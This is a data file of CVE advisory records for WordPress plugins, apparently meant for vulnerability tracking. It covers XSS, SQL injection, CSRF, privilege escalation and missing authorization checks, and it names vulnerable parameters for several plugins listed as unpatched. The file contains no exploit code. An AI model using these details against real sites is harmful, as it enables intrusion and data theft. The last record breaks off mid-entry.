{"CVE_ID":"CVE-2025-30977","slug":"chaport","versionImpact":"1.1.5","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Chaport Live Chat WP Live Chat + Chatbots Plugin for WordPress \u2013 Chaport allows Stored XSS. This issue affects WP Live Chat + Chatbots Plugin for WordPress \u2013 Chaport: from n\/a through 1.1.5.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/chaport\\\/vulnerability\\\/wordpress-wp-live-chat-chatbots-plugin-for-wordpress-chaport-1-1-5-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/chaport\\\/vulnerability\\\/wordpress-wp-live-chat-chatbots-plugin-for-wordpress-chaport-1-1-5-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8688","slug":"inline-stock-quotes","versionImpact":"0.2","description":"The Inline Stock Quotes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's stock shortcode in all versions up to, and including, 0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/inline-stock-quotes\\\/trunk\\\/inline-quotes.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/inline-stock-quotes\\\/trunk\\\/inline-quotes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/inline-stock-quotes\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/inline-stock-quotes\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93ab3e05-dbaf-4f55-a411-793a74c75071?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93ab3e05-dbaf-4f55-a411-793a74c75071?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5338","slug":"theme-blvd-shortcodes","versionImpact":"1.6.8","description":"The Theme Blvd Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 1.6.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88809668-ea6b-41df-b2a7-ffe03a931c86?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88809668-ea6b-41df-b2a7-ffe03a931c86?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theme-blvd-shortcodes\\\/tags\\\/1.6.8\\\/includes\\\/class-tb-column-shortcode.php#L97\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theme-blvd-shortcodes\\\/tags\\\/1.6.8\\\/includes\\\/class-tb-column-shortcode.php#L97\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1278","slug":"easy-facebook-likebox","versionImpact":"6.5.4","description":"The Easy Social Feed \u2013 Social Photos Gallery \u2013 Post Feed \u2013 Like Box plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'efb_likebox' shortcode in all versions up to, and including, 6.5.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b76bddf3-96ad-4bb0-a37b-33b451da6713?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b76bddf3-96ad-4bb0-a37b-33b451da6713?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-facebook-likebox\\\/tags\\\/6.5.4\\\/facebook\\\/frontend\\\/easy-facebook-likebox.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-facebook-likebox\\\/tags\\\/6.5.4\\\/facebook\\\/frontend\\\/easy-facebook-likebox.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3723","slug":"advanced-cf7-db","versionImpact":"2.0.2","description":"The Advanced Contact form 7 DB plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.0.2 via the wp-content\/uploads\/advanced-cf7-upload directory. This makes it possible for unauthenticated attackers to extract sensitive data uploaded via this plugin through a form.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9a1f1a1-4f0a-48b5-80c8-525b69006863?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9a1f1a1-4f0a-48b5-80c8-525b69006863?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-cf7-db\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-cf7-db\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7854","slug":"woo-inquiry","versionImpact":"0.1","description":"The Woo Inquiry plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 0.1 due to insufficient escaping on the user supplied parameter 'dbid' and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/312a6601-c914-4661-82ff-6f8bac849442?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/312a6601-c914-4661-82ff-6f8bac849442?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-inquiry\\\/trunk\\\/includes\\\/functions.php?rev=2088873#L307\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-inquiry\\\/trunk\\\/includes\\\/functions.php?rev=2088873#L307\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8044","slug":"infolinks-ad-wrap","versionImpact":"1.0.2","description":"The infolinks Ad Wrap WordPress plugin through 1.0.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/14b42ba8-7a8b-4fbf-86fb-6095879ec05c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/14b42ba8-7a8b-4fbf-86fb-6095879ec05c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9587","slug":"linkz-ai","versionImpact":"1.1.8","description":"The Linkz.ai plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ajax_linkz' function in versions up to, and including, 1.1.8. This makes it possible for authenticated attackers with contributor-level privileges or above, to update plugin settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1faa178-e4b1-4d2e-85f1-b852fbf3ab17?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1faa178-e4b1-4d2e-85f1-b852fbf3ab17?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linkz-ai\\\/tags\\\/1.1.8\\\/init.php#L252\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linkz-ai\\\/tags\\\/1.1.8\\\/init.php#L252\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8627","slug":"ultimate-tinymce","versionImpact":"5.7","description":"The Ultimate TinyMCE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'field' shortcode in all versions up to, and including, 5.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ddd9cab-f381-4343-a2e6-ef8a1be2ed4e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ddd9cab-f381-4343-a2e6-ef8a1be2ed4e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-tinymce\\\/trunk\\\/admin_functions.php#L81\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-tinymce\\\/trunk\\\/admin_functions.php#L81\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23535","slug":"drag-and-drop-custom-sidebar","versionImpact":"0.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in clickandsell REAL WordPress Sidebar allows Stored XSS. This issue affects REAL WordPress Sidebar: from n\/a through 0.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/drag-and-drop-custom-sidebar\\\/vulnerability\\\/wordpress-real-wordpress-sidebar-plugin-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/drag-and-drop-custom-sidebar\\\/vulnerability\\\/wordpress-real-wordpress-sidebar-plugin-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13327","slug":"musicbox","versionImpact":"2.0.3","description":"The Musicbox WordPress plugin through 2.0.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/abc8f3e1-2aee-44f0-8ecd-0ea424c0540a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/abc8f3e1-2aee-44f0-8ecd-0ea424c0540a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6432","slug":"custom-post-widget","versionImpact":"3.3.5","description":"The Content Blocks (Custom Post Widget) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018content\u2019 parameter within the plugin's shortcode Content Block in all versions up to, and including, 3.3.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-post-widget\\\/trunk\\\/shortcode.php#L73\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-post-widget\\\/trunk\\\/shortcode.php#L73\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3146407\\\/#file6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3146407\\\/#file6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147521\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147521\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/custom-post-widget\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/custom-post-widget\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f784dfa-5c31-4c44-9230-7beac7f56893?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f784dfa-5c31-4c44-9230-7beac7f56893?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11847","slug":"wp-svg-upload","versionImpact":"1.0.0","description":"The wp-svg-upload WordPress plugin through 1.0.0 does not sanitize SVG file contents, which enables users with at least the author role to upload SVG files containing malicious JavaScript to conduct Stored XSS attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f57ecff2-0cff-40c7-b6e4-5b162b847d65\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f57ecff2-0cff-40c7-b6e4-5b162b847d65\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3866","slug":"add-google-plus-one-social-share-button","versionImpact":"1.0.0","description":"The Add Google +1 (Plus one) social share Button plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing or incorrect nonce validation on the google-plus-one-share-button page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-google-plus-one-social-share-button\\\/tags\\\/1.0.0\\\/gp_admin_page.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-google-plus-one-social-share-button\\\/tags\\\/1.0.0\\\/gp_admin_page.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/add-google-plus-one-social-share-button\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/add-google-plus-one-social-share-button\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/190a3b11-c6ca-4666-8c7f-b22bb4a4961d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/190a3b11-c6ca-4666-8c7f-b22bb4a4961d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13828","slug":"badgearoo","versionImpact":"1.0.14","description":"The Badgearoo WordPress plugin through 1.0.14 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0f901807-9ef2-4cd3-969a-9fd23a8da371\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0f901807-9ef2-4cd3-969a-9fd23a8da371\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-30938","slug":"broadly","versionImpact":"3.0.2","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in broadly Broadly for WordPress allows Stored XSS. This issue affects Broadly for WordPress: from n\/a through 3.0.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/broadly\\\/vulnerability\\\/wordpress-broadly-for-wordpress-3-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/broadly\\\/vulnerability\\\/wordpress-broadly-for-wordpress-3-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8685","slug":"wp-chart-generator","versionImpact":"1.0.4","description":"The Wp chart generator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpchart shortcode in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wp-chart-generator\\\/trunk\\\/wp-chart.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wp-chart-generator\\\/trunk\\\/wp-chart.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-chart-generator\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-chart-generator\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25302010-202a-458e-93b6-2e6b8604c091?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25302010-202a-458e-93b6-2e6b8604c091?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2833","slug":"reviewx","versionImpact":"1.6.13","description":"The ReviewX plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 1.6.13 due to insufficient restriction on the 'rx_set_screen_options' function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'wp_screen_options[option]' and 'wp_screen_options[value]' parameters during a screen option update.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2916148%40reviewx&old=2912114%40reviewx&sfp_email=&sfph_mail=#file472\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2916148%40reviewx&old=2912114%40reviewx&sfp_email=&sfph_mail=#file472\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70e1d701-2cff-4793-9e4c-5b16a4038e8d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70e1d701-2cff-4793-9e4c-5b16a4038e8d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2023\\\/05\\\/wpdeveloper-addresses-privilege-escalation-vulnerability-in-reviewx-wordpress-plugin\\\/\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2023\\\/05\\\/wpdeveloper-addresses-privilege-escalation-vulnerability-in-reviewx-wordpress-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/lana.codes\\\/lanavdb\\\/a889c3ff-5df0-4d7e-951f-0b0406468efa\\\/\",\"name\":\"https:\\\/\\\/lana.codes\\\/lanavdb\\\/a889c3ff-5df0-4d7e-951f-0b0406468efa\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reviewx\\\/tags\\\/1.6.13\\\/includes\\\/rx-functions.php#L972\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reviewx\\\/tags\\\/1.6.13\\\/includes\\\/rx-functions.php#L972\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0551","slug":"rest-api-to-miniprogram","versionImpact":"4.6.1","description":"The REST API TO MiniProgram WordPress plugin through 4.6.1 does not have authorisation and CSRF checks in an AJAX action, allowing any authenticated user, such as a subscriber, to call it and delete arbitrary attachments.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de162a46-1fdb-47b9-9a61-f12a2c655a7d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de162a46-1fdb-47b9-9a61-f12a2c655a7d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1782","slug":"blue-triad-ezanalytics","versionImpact":"1.0","description":"The Blue Triad EZAnalytics plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'bt_webid' parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cae2bb8-33e7-47b0-861d-b976a67660ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cae2bb8-33e7-47b0-861d-b976a67660ae?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blue-triad-ezanalytics\\\/trunk\\\/blue-triad-ezanalytics.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blue-triad-ezanalytics\\\/trunk\\\/blue-triad-ezanalytics.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1214","slug":"easy-facebook-likebox","versionImpact":"6.5.4","description":"The Easy Social Feed \u2013 Social Photos Gallery \u2013 Post Feed \u2013 Like Box plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.5.4. This is due to missing or incorrect nonce validation on the save_groups_list function. This makes it possible for unauthenticated attackers to disconnect a site's facebook or instagram page\/group connection via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aaf62045-b9ce-40d7-92b3-7ab683e5a08c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aaf62045-b9ce-40d7-92b3-7ab683e5a08c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-facebook-likebox\\\/trunk\\\/facebook\\\/admin\\\/class-easy-facebook-likebox-admin.php?rev=3047064\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-facebook-likebox\\\/trunk\\\/facebook\\\/admin\\\/class-easy-facebook-likebox-admin.php?rev=3047064\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5229","slug":"primary-addon-for-elementor","versionImpact":"1.5.5","description":"The Primary Addon for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Pricing Table widget in all versions up to, and including, 1.5.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6ea95b5-9e1c-41b1-9bc5-5fd5cecef65d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6ea95b5-9e1c-41b1-9bc5-5fd5cecef65d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/primary-addon-for-elementor\\\/trunk\\\/elementor\\\/widgets\\\/basic\\\/nabasic-pricing-table.php#L775\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/primary-addon-for-elementor\\\/trunk\\\/elementor\\\/widgets\\\/basic\\\/nabasic-pricing-table.php#L775\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3092073\\\/primary-addon-for-elementor\\\/trunk\\\/elementor\\\/widgets\\\/basic\\\/nabasic-pricing-table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3092073\\\/primary-addon-for-elementor\\\/trunk\\\/elementor\\\/widgets\\\/basic\\\/nabasic-pricing-table.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3092073\\\/#file366\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3092073\\\/#file366\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/primary-addon-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/primary-addon-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7651","slug":"app-builder","versionImpact":"4.2.6","description":"The App Builder \u2013 Create Native Android & iOS Apps On The Flight plugin for WordPress is vulnerable to limited SQL Injection via the \u2018app-builder-search\u2019 parameter in all versions up to, and including, 4.2.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b43371a6-bcb5-4418-b5a5-85879775010c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b43371a6-bcb5-4418-b5a5-85879775010c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/app-builder\\\/trunk\\\/includes\\\/pure.php#L18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/app-builder\\\/trunk\\\/includes\\\/pure.php#L18\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8043","slug":"vikinghammer-tweet","versionImpact":"0.2.4","description":"The Vikinghammer Tweet WordPress plugin through 0.2.4 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2ba27715-add4-4e2c-ad0d-83ebdc26aec1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2ba27715-add4-4e2c-ad0d-83ebdc26aec1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9586","slug":"linkz-ai","versionImpact":"1.1.8","description":"The Linkz.ai plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'check_auth' and 'check_logout' functions in versions up to, and including, 1.1.8. This makes it possible for unauthenticated attackers to update plugin settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 